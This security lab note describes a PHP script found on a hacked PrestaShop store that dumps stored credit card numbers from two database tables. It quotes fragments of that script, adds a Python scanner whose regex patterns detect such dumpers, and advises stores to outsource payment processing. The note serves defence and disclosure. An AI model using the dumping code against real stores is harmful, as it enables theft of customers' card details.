Stealing Credit Card Details from PrestaShop

Labs Note

We have written multiple times about attacks on e-commerce sites that try to steal the credit card details of their customers. In most cases, all such attacks need is the brief moment when the site processes the payment details. It can be injected JavaScript that steals your data as you enter it in the order form. Or it can be a server-side script that inserts itself as a middleman between the code that receives the data from the user and the code that sends that data to a secure payment gateway. Note that in both of these scenarios the e-commerce sites don’t even try to save the credit card information on their servers. The mere fact that they have the payment form on their own domain is enough for hackers to hijack it once they break into the site.

However, hijacking a payment form means that hackers can only steal details of ongoing payments. They have to wait for people to buy something from the compromised sites. But if hacked sites use really poor security practices and save all the payment details on their own servers, the attackers can easily steal credit card details of their customers without having to wait for new victims.

For example, in some versions of PrestaShop, there are standard tables (ps_payment_cc and ps_order_payment) for storing all credit card information (card number, expiration, card holder, etc.). Unfortunately, some PrestaShop payment modules indeed save credit card details in the database, so hackers just couldn’t help taking advantage of this.

On a hacked PrestaShop site, we found a malicious script that connected to the database and dumped credit card numbers from the ps_payment_cc and ps_order_payment tables.

...
$Select0= mysql_query("SELECT id_order_payment,card_number,card_brand,card_expiration FROM ps_payment_cc");
$Select1= mysql_query("SELECT id_order_payment,card_number,card_brand,card_expiration FROM ps_order_payment");
…
while($ccv1 = mysql_fetch_assoc($Select0)){
    echo "
      <tr>
        <td>".$ccv1['id_order_payment']."</td>
        <td>".$ccv1['card_number']."</td>
        <td>".$ccv1['card_brand']."</td>
        <td>".$ccv1['card_expiration']."</td>
      </tr>
    ";
}
...
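One way to hunt for this kind of dumper across a webroot, as an added example that is not part of the original note: the scanner below flags PHP files that select card columns from the two tables named above and marks whether the file also echoes `card_number`. The function names, file extensions and sample strings are assumptions made for illustration.

```python
import os
import re

# Table and column names are the ones in the dumper quoted above.
CARD_TABLES = ("ps_payment_cc", "ps_order_payment")
CARD_COLUMNS = ("card_number", "card_expiration")

# SELECT <cols> FROM <table>; checked below for a card column and a card table.
QUERY_RE = re.compile(
    r"select\b(?P<cols>[^;]*?)\bfrom\s+[`'\"]?(?P<table>\w+)", re.I | re.S)
# echo/print statement that emits a fetched card_number field.
ECHO_RE = re.compile(r"\b(?:echo|print)\b[^;]*\[\s*['\"]card_number['\"]\s*\]", re.I | re.S)

# Constructed samples (not taken from a real site).
SAMPLE_DUMPER = '''<?php
$q = mysql_query("SELECT id_order_payment,card_number,card_expiration FROM ps_payment_cc");
while ($r = mysql_fetch_assoc($q)) { echo "<td>".$r['card_number']."</td>"; }
'''
SAMPLE_CLEAN = '<?php $q = mysql_query("SELECT id_order FROM ps_orders");'


def scan_source(text):
    """Return [(table, card_columns, echoes_card_number)] for one file's text."""
    echoes = bool(ECHO_RE.search(text))
    findings = []
    for m in QUERY_RE.finditer(text):
        table = m.group("table").lower()
        cols = [c for c in CARD_COLUMNS if c in m.group("cols").lower()]
        if table in CARD_TABLES and cols:
            findings.append((table, cols, echoes))
    return findings


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a webroot and return {path: findings} for files that match."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    print(scan_source(SAMPLE_DUMPER))
    print(scan_source(SAMPLE_CLEAN))
```

Hits are leads for manual review, since a payment module that stores card data will match too. Queries written as `SELECT *`, obfuscated code, or a non-default table prefix are not covered by this sketch.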

If you have an e-commerce site, avoid saving customer payment details on your server at all costs. Modules that send payment information to third-party payment gateways and don’t save anything locally are a bit safer, but they can still be easily hijacked to steal ongoing payments. For small sites, the safest option is to completely outsource payment processing to payment gateways. You should only ask for the information that you need to ship the order and then redirect the customers to a trusted payment service (PayPal, Authorize.net, Stripe, etc.) where they can finish the order process.

You can find more information about e-commerce security and PCI compliance on our blog where we regularly share information about how hackers compromise online stores and what it takes to make e-commerce sites secure.
